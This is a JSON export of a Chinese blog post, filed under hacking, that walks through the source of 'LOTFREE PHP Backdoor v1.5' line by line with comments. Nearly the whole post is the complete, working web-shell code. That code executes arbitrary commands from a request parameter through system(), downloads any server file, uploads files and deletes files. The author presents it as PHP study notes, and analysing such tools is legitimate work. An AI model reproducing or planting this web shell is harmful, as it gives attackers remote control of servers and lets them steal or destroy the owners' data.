{"id":126,"date":"2012-10-11T19:18:57","date_gmt":"2012-10-11T11:18:57","guid":{"rendered":"http:\/\/www.yeetrack.com\/wordpress\/?p=283"},"modified":"2013-04-20T17:31:11","modified_gmt":"2013-04-20T09:31:11","slug":"php%e5%90%8e%e9%97%a8%e7%a8%8b%e5%ba%8f%e8%a7%a3%e6%9e%90","status":"publish","type":"post","link":"https:\/\/www.yeetrack.com\/?p=126","title":{"rendered":"php \u540e\u95e8\u7a0b\u5e8f\u89e3\u6790"},"content":{"rendered":"<p>PHP Backdoor Version 1.5\u662f\u7531sirius_black \/ LOTFREE TEAM\u7f16\u5199\u7684\u4e00\u4e2aphp\u540e\u95e8\u7a0b\u5e8f\uff0c\u8fd9\u91cc\u5bf9\u5176\u8fdb\u884c\u4e00\u4e0b\u7b80\u5355\u89e3\u6790<!--more-->\uff0c\u4e5f\u5f53\u505a\u81ea\u5df1\u5b66\u4e60php\u7684\u7b14\u8bb0\uff0c\u8be5\u540e\u95e8\u7a0b\u5e8f\u6210\u6267\u884c\u7684\u547d\u4ee4\uff0c\u53d6\u51b3\u4e8e\u5b89\u88c5web\u670d\u52a1\u5668\u548cphp\u65f6\u7528\u6237\u7684\u6743\u9650\uff0c\u5982\u679c\u662f\u7ba1\u7406\u5458\u7684\u8bdd\uff0c\u90a3\u5c31\u53ef\u4ee5\u6267\u884c\u5404\u79cd\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u3002\u6613\u8e2a\u8bba\u575b\uff1a<a href=\"https:\/\/www.yeetrack.com\/bbs\/forum.php?mod=forumdisplay&amp;fid=39\">https:\/\/www.yeetrack.com\/bbs\/forum.php?mod=forumdisplay&amp;fid=39<\/a>\uff0cO(\u2229_\u2229)O&lt;!--goodlink\u51fd\u6570\u7528\u6765\u8fc7\u6ee4\u6389url\u4e2d\u7684\u4e00\u4e9b\u975e\u6cd5\u5b57\u7b26--&gt;<br \/>&lt;?php<br \/>function good_link($link)<br \/>{<br \/>$link=ereg_replace(&quot;\/+&quot;,&quot;\/&quot;,$link);<br \/>$link=ereg_replace(&quot;\/[^\/(..)]+\/..&quot;,&quot;\/&quot;,$link);<br \/>$link=ereg_replace(&quot;\/+&quot;,&quot;\/&quot;,$link);<br \/>if(!strncmp($link,&quot;.\/&quot;,2) &amp;&amp; strlen($link)&gt;2)$link=substr($link,2);<br \/>if($link==&quot;&quot;)$link=&quot;.&quot;;<br \/>return $link;<br \/>}<br \/>\/\/$_REQUEST\u7528\u6765\u53d6\u5f97\u63d0\u4ea4\u5230\u672c\u6587\u4ef6\u7684\u6570\u636e<br \/>$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:&quot;.&quot;; \/\/\u5982\u679c\u6ca1\u6709\u5b9a\u4e49dir\uff0cdir\u53d6\u9ed8\u8ba4\u503c&quot;.&quot;<br \/>$dir=good_link($dir);<br \/>$rep=opendir($dir);&nbsp; \/\/\u6253\u5f00dir\u6307\u5b9a\u7684\u8def\u5f84\u53e5\u67c4<br \/>chdir($dir);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \/\/\u5207\u6362\u5230dir\u6307\u5b9a\u7684\u76ee\u5f55<br \/>if(isset($_REQUEST[&quot;down&quot;]) &amp;&amp; $_REQUEST[&quot;down&quot;]!=&quot;&quot;)&nbsp;&nbsp; \/\/\u5982\u679c\u5b9a\u4e49\u4e86down<br \/>{<br \/>header(&quot;Content-Type: application\/octet-stream&quot;);<br \/>header(&quot;Content-Length: &quot;.filesize($_REQUEST[&quot;down&quot;]));<br \/>header(&quot;Content-Disposition: attachment; filename=&quot;.basename($_REQUEST[&quot;down&quot;]));<br \/>readfile($_REQUEST[&quot;down&quot;]); \/\/\u5c06\u6587\u4ef6\u8bfb\u53d6\u5230\u7f13\u51b2\u533a<br \/>exit();<br \/>}<br \/>?&gt;<br \/>&lt;html&gt;<br \/>&lt;head&gt;&lt;title&gt;LOTFREE PHP Backdoor v1.5\uff0c\u6613\u8e2a\u7f51yeetrack.com&lt;\/title&gt;&lt;\/head&gt;<br \/>&lt;body&gt;<br \/>&lt;br&gt;<br \/>&lt;?php<br \/>echo &quot;\u5f53\u524d\u7edd\u5bf9\u8def\u5f84\u4e3a: &lt;b&gt;&quot;.getcwd().&quot;&lt;\/b&gt;&lt;br&gt;n&quot;; \/\/\u83b7\u53d6\u5f53\u524d\u7684\u7edd\u5bf9\u8def\u5f84<br \/>echo &quot;&lt;b&gt;dir = '$dir'&lt;\/b&gt;&lt;br&gt;n&quot;;<br \/>echo &quot;\u5f53\u524d\u76ee\u5f55\uff0c\u6587\u4ef6\u5217\u8868 !&lt;br&gt;&lt;br&gt;n&quot;;<br \/>\/\/\u5982\u679c\u5df2\u7ecf\u8f93\u5165\u8981\u6267\u884c\u7684\u547d\u4ee4<br \/>if(isset($_REQUEST['cmd']) &amp;&amp; $_REQUEST['cmd']!=&quot;&quot;)<br \/>{<br \/>&nbsp;&nbsp;&nbsp; echo &quot;&lt;pre&gt;n&quot;;<br \/>&nbsp;&nbsp;&nbsp; system($_REQUEST['cmd']); \/\/\u5728\u670d\u52a1\u5668\u4e0a\u6267\u884c\u8f93\u5165\u7684\u547d\u4ee4\uff0c\u6267\u884c\u7ed3\u679c\u56de\u663e<br \/>&nbsp;&nbsp;&nbsp; echo &quot;&lt;\/pre&gt;n&quot;;<br \/>}<br \/>\/\/\u5982\u679c\u5df2\u7ecf\u4e0a\u4f20\u4e86\u6587\u4ef6<br \/>if(isset($_FILES[&quot;fic&quot;][&quot;name&quot;]) &amp;&amp; isset($_POST[&quot;MAX_FILE_SIZE&quot;])) \/\/\u83b7\u53d6post\u4e0a\u6765\u7684\u6587\u4ef6\uff0c\u4fdd\u5b58\u5230\u5f53\u524d\u76ee\u5f55<br \/>{<br \/>&nbsp;&nbsp;&nbsp; if($_FILES[&quot;fic&quot;][&quot;size&quot;]&lt;$_POST[&quot;MAX_FILE_SIZE&quot;])&nbsp;&nbsp;&nbsp; \/\/\u5224\u65ad\u6587\u4ef6\u662f\u5426\u7b26\u5408\u5927\u5c0f\u89c4\u8303<br \/>&nbsp;&nbsp;&nbsp; {<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(move_uploaded_file($_FILES[&quot;fic&quot;][&quot;tmp_name&quot;],good_link(&quot;.\/&quot;.$_FILES[&quot;fic&quot;][&quot;name&quot;]))) \/\/\u5c06\u4e34\u65f6\u6587\u4ef6\u4fdd\u5b58\u5230\u5f53\u524d\u76ee\u5f55<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; echo &quot;\u6587\u4ef6\u4fdd\u5b58\u6210\u529f &quot;.good_link(&quot;.\/&quot;.$_FILES[&quot;fic&quot;][&quot;name&quot;]).&quot;!&lt;br&gt;n&quot;;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; else echo &quot;\u6587\u4ef6\u4e0a\u4f20\u5931\u8d25: &quot;.$_FILES[&quot;fic&quot;][&quot;error&quot;].&quot;&lt;br&gt;n&quot;;<br \/>&nbsp;&nbsp;&nbsp; }<br \/>&nbsp;&nbsp;&nbsp; else echo &quot;File too large\uff08\u6587\u4ef6\u8d85\u51fa\u5927\u5c0f\u9650\u5236)!&lt;br&gt;n&quot;;<br \/>}<br \/>if(isset($_REQUEST['rm']) &amp;&amp; $_REQUEST['rm']!=&quot;&quot;) \/\/\u5982\u679c\u5b9a\u4e49\u4e86rm\uff0c\u5373\u5220\u9664\u6307\u5b9a\u7684\u6587\u4ef6<br \/>{<br \/>&nbsp;&nbsp;&nbsp; if(unlink($_REQUEST['rm'])) \/\/unlink\u662fphp\u7684\u5220\u9664\u6587\u4ef6\u51fd\u6570<br \/>&nbsp;&nbsp;echo &quot;\u6210\u529f\u5220\u9664 &quot;.$_REQUEST['rm'].&quot; !&lt;br&gt;n&quot;;<br \/>&nbsp;&nbsp;&nbsp; else echo &quot;\u5220\u9664\u6587\u4ef6\u5931\u8d25&lt;br&gt;n&quot;;<br \/>}<br \/>?&gt;<br \/>&lt;hr&gt;<br \/>&lt;table align=&quot;center&quot; width=&quot;95%&quot; border=&quot;0&quot; cellspacing=&quot;0&quot; bgcolor=&quot;lightblue&quot;&gt;<br \/>&lt;?php<br \/>$t_dir=array();<br \/>$t_file=array();<br \/>$i_dir=0;<br \/>$i_file=0;<br \/>\/\/\u5faa\u73af\u8f93\u8bfb\u53d6\u524d\u7684\u76ee\u5f55\u6587\u4ef6\uff0c\u653e\u5728t_dir\u548ct_file\u4e2d<br \/>while($x=readdir($rep))<br \/>{<br \/>&nbsp;&nbsp;&nbsp; if(is_dir($x))&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \/\/\u5982\u679c\u5f53\u524d\u5904\u7406\u7684\u662f\u76ee\u5f55<br \/>&nbsp;&nbsp;$t_dir[$i_dir++]=$x;<br \/>&nbsp;&nbsp;&nbsp; else&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \/\/\u5982\u679c\u5f53\u524d\u5904\u7406\u7684\u662f\u6587\u4ef6<br \/>&nbsp;&nbsp;$t_file[$i_file++]=$x;&nbsp;&nbsp;<br \/>}<br \/>closedir($rep); \/\/\u5173\u95ed\u7531opendir\u6253\u5f00\u7684\u76ee\u5f55\u53e5\u67c4<br \/>while(1) \/\/\u5faa\u73af\u8f93\u5165\u5f53\u524d\u8def\u5f84\u7684\u76ee\u5f55\u548c\u6587\u4ef6<br \/>{<br \/>&nbsp;?&gt;<br \/>&nbsp;&lt;!--\u7528\u8868\u683c\u6765\u5c55\u793a\u5f53\u524d\u76ee\u5f55\u7684\u6587\u4ef6--&gt;<br \/>&nbsp;&lt;tr&gt;<br \/>&nbsp;&lt;td width=&quot;20%&quot; bgcolor=&quot;lightgray&quot; valign=&quot;top&quot;&gt;<br \/>&nbsp;&lt;?php<br \/>&nbsp;&nbsp;if($x=each($t_dir))<br \/>&nbsp;&nbsp;{<br \/>&nbsp;&nbsp;$name=$x[&quot;value&quot;]; \/\/\u83b7\u53d6t_dir\u6570\u7ec4\u91cc\u7684\u76ee\u5f55\u540d\u79f0<br \/>&nbsp;&nbsp;if($name=='.'){}<br \/>&nbsp;&nbsp;elseif($name=='..') echo &quot;&nbsp;&nbsp;&nbsp; &lt;a href='&quot;.$_SERVER['PHP_SELF'].&quot;?dir=&quot;.good_link(&quot;$dir\/..\/&quot;).&quot;'&gt;UP(\u7236\u76ee\u5f55)&lt;\/a&gt;&lt;br&gt;&lt;br&gt;n&quot;; \/\/\u5c55\u793a\u4e00\u4e2aUP\u94fe\u63a5\uff0c\u8bfb\u53d6\u7236\u76ee\u5f55\u7684\u6587\u4ef6\u5217\u8868<br \/>&nbsp;&nbsp;else<br \/>&nbsp;&nbsp;&nbsp;echo &quot;&nbsp;&nbsp;&nbsp; &lt;a href='&quot;.$_SERVER['PHP_SELF'].&quot;?dir=&quot;.good_link(&quot;$dir\/$name&quot;).&quot;'&gt;&quot;.$name.&quot;&lt;\/a&gt;n&quot;;<br \/>&nbsp;&nbsp;}<br \/>&nbsp;?&gt;<br \/>&nbsp;&lt;\/td&gt;<br \/>&nbsp;&lt;td width='78%'<br \/>&nbsp;&lt;?php<br \/>&nbsp;&nbsp;\/\/$_SERVER['PHP_SELF']\u53d6\u5f97\u5f53\u524dphp\u811a\u672c\u6587\u4ef6\u540d<br \/>&nbsp;&nbsp;if($y=each($t_file))<br \/>&nbsp;&nbsp;{<br \/>&nbsp;&nbsp;&nbsp;if($y[&quot;key&quot;]%2==0)&nbsp; \/\/\u5982\u679c\u5f53\u524d\u5904\u7406\u7684\u662fkey<br \/>&nbsp;&nbsp;&nbsp;&nbsp;echo &quot; bgcolor='lightgreen'&gt;n&quot;;<br \/>&nbsp;&nbsp;&nbsp;else&nbsp;&nbsp;&nbsp; \/\/\u5982\u679c\u5f53\u524d\u5904\u7406\u7684\u662fvalue\uff0c\u5373\u6587\u4ef6\u3002\u5c31\u5c06\u8be5\u6587\u4ef6\u5c55\u793a\u51fa\u6765\uff0c\u4e14\u63d0\u4f9b\u4e0b\u8f7d\u94fe\u63a5\u3002<br \/>&nbsp;&nbsp;&nbsp;&nbsp;echo &quot;&gt;n&quot;;<br \/>&nbsp;&nbsp;&nbsp;echo &quot;&nbsp;&nbsp;&nbsp; &lt;a href='&quot;.$_SERVER['PHP_SELF'].&quot;?dir=$dir&amp;down=&quot;.$y[&quot;value&quot;].&quot;'&gt;&quot;.$y[&quot;value&quot;].&quot;&lt;\/a&gt;n&quot;;<br \/>&nbsp;&nbsp;}<br \/>&nbsp;&nbsp;else echo &quot;&gt;n&quot;;<br \/>&nbsp;?&gt;<br \/>&nbsp;&lt;\/td&gt;<br \/>&nbsp;&lt;td valign='center' width='2%'<br \/>&nbsp;&lt;?php<br \/>&nbsp;&nbsp;if($y)<br \/>&nbsp;&nbsp;{<br \/>&nbsp;&nbsp;&nbsp;\/\/\u5982\u679c\u662f\u6587\u4ef6\uff0c\u5c31\u63d0\u4f9b\u4ee5\u4e0b\u5220\u9664\u8be5\u6587\u4ef6\u7684\u94fe\u63a5<br \/>&nbsp;&nbsp;&nbsp;if($y[&quot;key&quot;]%2==0)echo &quot; bgcolor='lightgreen'&quot;;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;echo &quot;&gt;&lt;a href='&quot;.$_SERVER['PHP_SELF'].&quot;?dir=$dir&amp;rm=&quot;.$y[&quot;value&quot;].&quot;'&gt;&lt;b&gt;Del&lt;\/b&gt;&lt;\/a&gt;&quot;;<br \/>&nbsp;&nbsp;}<br \/>&nbsp;&nbsp;else echo &quot;&gt;n&quot;;<br \/>&nbsp;?&gt;<br \/>&nbsp;&lt;\/td&gt;<br \/>&nbsp;&lt;\/tr&gt;<br \/>&nbsp;&lt;?php<br \/>&nbsp;&nbsp;if(!$x &amp;&amp; !$y)<br \/>&nbsp;&nbsp;&nbsp;break;<br \/>}<br \/>?&gt;<br \/>&lt;\/table&gt;<br \/>&lt;hr&gt;<br \/>&lt;br&gt;<br \/>&lt;a href=&quot;&lt;?php echo $_SERVER['PHP_SELF']; ?&gt;?dir=&quot;&gt;revenir au repertoire d'origine&lt;\/a&gt;&lt;br&gt;&lt;br&gt;<br \/>&lt;!--form\u8868\u5355\uff0c\u5c06\u7528\u6237\u8f93\u5165\u7684\u547d\u4ee4post\u5230\u670d\u52a1\u5668--&gt;<br \/>&lt;form method=&quot;post&quot; action=&quot;&lt;?php echo $_SERVER['PHP_SELF'].&quot;?dir=$dir&quot;; ?&gt;&quot;&gt;&nbsp;&nbsp; &lt;!--action\u52a8\u4f5c\uff0c\u5c06\u8bf7\u6c42\u53d1\u9001\u7ed9\u5f53\u524dphp\u6587\u4ef6\uff0c\u5e76\u4e14\u5b9a\u4e49dir\uff0c\u5237\u65b0\u5f53\u524d\u6587\u4ef6\u5217\u8868--&gt;<br \/>Execute commande(\u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4) &lt;input type=&quot;text&quot; name=&quot;cmd&quot;&gt; &lt;input type=&quot;submit&quot; value=&quot;Run(\u6267\u884c)&quot;&gt;<br \/>&lt;\/form&gt;&lt;br&gt;<br \/>\u4e0a\u4f20\u6587\u4ef6\u5230\u670d\u52a1\u5668\u5f53\u524d\u76ee\u5f55 :&lt;br&gt;<br \/>&lt;form enctype=&quot;multipart\/form-data&quot; method=&quot;post&quot; action=&quot;&lt;?php echo $_SERVER['PHP_SELF'].&quot;?dir=$dir&quot;; ?&gt;&quot;&gt; &lt;!--action\u52a8\u4f5c\uff0c\u5c06\u6587\u4ef6post\u5230\u670d\u52a1\u5668\uff0c\u5237\u65b0\u5f53\u524d\u6587\u4ef6\u5217\u8868--&gt;<br \/>&lt;input type=&quot;file&quot; name=&quot;fic&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;MAX_FILE_SIZE&quot; value=&quot;100000&quot;&gt;<br \/>&lt;input type=&quot;submit&quot; value=&quot;\u5f00\u59cb\u4e0a\u4f20!&quot;&gt;&lt;\/form&gt;&lt;br&gt;<br \/>&lt;br&gt;<br \/>\u6613\u8e2a\u7f51<a title=\"\u6613\u8e2a\u7f51\" href=\"https:\/\/www.yeetrack.com\">yeetrack.com<\/a><br \/>&lt;center&gt;<br \/>PHP Backdoor Version 1.5&lt;br&gt;<br \/>by sirius_black \/ LOTFREE TEAM&lt;br&gt;<br \/>Execute commands, browse the filesystem&lt;br&gt;<br \/>Upload, download and delete files...&lt;br&gt;<br \/>&lt;a href=&quot;<a href=\"http:\/\/www.lsdp.net\/~lotfree%22%3Ehttp:\/\/www.lsdp.net\/~lotfree%3C\/a%3E%3Cbr\">http:\/\/www.lsdp.net\/~lotfree&quot;&gt;http:\/\/www.lsdp.net\/~lotfree&lt;\/a&gt;&lt;br<\/a>&gt;<br \/>&lt;\/center&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PHP Backdoor Version 1.5\u662f\u7531sirius_black \/ LOTFREE TEAM\u7f16\u5199\u7684\u4e00\u4e2aphp\u540e\u95e8\u7a0b\u5e8f\uff0c\u8fd9\u91cc\u5bf9\u5176\u8fdb\u884c\u4e00\u4e0b\u7b80\u5355\u89e3\u6790<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"pgc_sgb_lightbox_settings":"","footnotes":""},"categories":[35],"tags":[24,7],"class_list":["post-126","post","type-post","status-publish","format-standard","hentry","category-hacking","tag-php","tag-7"],"views":3135,"_links":{"self":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=126"}],"version-history":[{"count":2,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/126\/revisions"}],"predecessor-version":[{"id":439,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/126\/revisions\/439"}],"wp:attachment":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}